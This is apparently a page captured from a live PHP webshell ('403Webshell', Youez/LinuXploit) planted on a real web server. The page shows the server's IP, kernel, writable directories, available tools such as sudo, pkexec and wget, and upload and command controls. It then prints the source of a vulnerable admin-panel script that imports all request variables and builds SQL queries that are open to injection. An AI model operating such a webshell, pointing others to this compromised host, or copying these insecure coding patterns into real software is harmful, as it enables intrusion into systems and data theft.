403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_substatic_page.php
<?php
include_once("session.php");
include_once("settings.php");
foreach ($_REQUEST as $key => $value){
	 $$key = $value;
}
$EditDescription=addslashes($EditDescription);

function uploadPhoto($fileName){
	if ($_FILES[$fileName]["error"] == 0) {
		$tmp_name = $_FILES[$fileName]["tmp_name"];
		$photoName = $_FILES[$fileName]["name"];
		$photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
		$photoNameArr = explode(".",$photoName);
		//echo "<pre>";print_r($photoNameArr);echo "</pre>";
		//echo count($photoNameArr)."<br>";
		$fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
		//echo $fileExt."<br>";
		unset($photoNameArr[count($photoNameArr)-1]);
		//echo "<pre>";print_r($photoNameArr);echo "</pre>";
		$photoNameWithoutExt = implode("_",$photoNameArr);
		//echo $photoNameWithoutExt."<br>";
		//$img1New = $photoNameWithoutExt.time().".".$fileExt;
		$img1New = $fileName.time().".".$fileExt;
		//echo $img1New."<br>";
		if($fileExt == "png" || $fileExt == "gif" || $fileExt == "jpg" || $fileExt == "jpeg" ){
			$img1New			=	$img1New;
			move_uploaded_file($tmp_name, "../cat_images/".$img1New.""); 
			return  $img=  $img1New ;
		}
		else{  $img =''; ?>
			<script>
			document.location="substatic_page_list.php?page=listpage";
			</script>
		<?php }
	}
	else{ ?>
		<script>
			document.location="substatic_page_list.php?page=listpage";
		</script>
	<?php }
}



if($_REQUEST['mode']=="Edit"){
	$sqlUnlink		=	"SELECT * FROM `tblSubTextElement` WHERE `id` = ".$id."  LIMIT 1";
	$ressetUnlink	=	mysql_query($sqlUnlink) or die(mysql_error());
	$rowUnlink		=	mysql_fetch_assoc($ressetUnlink);
	$unlinkFile		=	$rowUnlink['headerImage'];

	$pic1 = uploadPhoto("header");
	if($pic1 != ''){$bannerImg = "headerImage = '".$pic1."',";}

	 $sql="update  `tblSubTextElement` set ".$bannerImg." `title`='".$txtTitle."',`content`='".$EditDescription."',`metaDescription`='".$metaDescription."',`metaTitle`='".$metaTitle."',`metaKeyword`='".$metaKeyword."',`updated_on`=now() where `id`='".$id."'";
	 if($pic1 != ''){
		@unlink("../cat_images/".$unlinkFile);
	}
}
else{
		$pic1 = uploadPhoto("header");
	  $sql="insert into `tblSubTextElement` (`title`,`headerImage`,`content`,`metaTitle`,`metaKeyword`,`metaDescription`,`created_on`) value ('".$txtTitle."','".$pic1."','".$EditDescription."','".$metaTitle."','".$metaKeyword."','".$metaDescription."',now())";
}
$result=mysql_query($sql);
?>
<script>
document.location="substatic_page_list.php?page=listpage";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit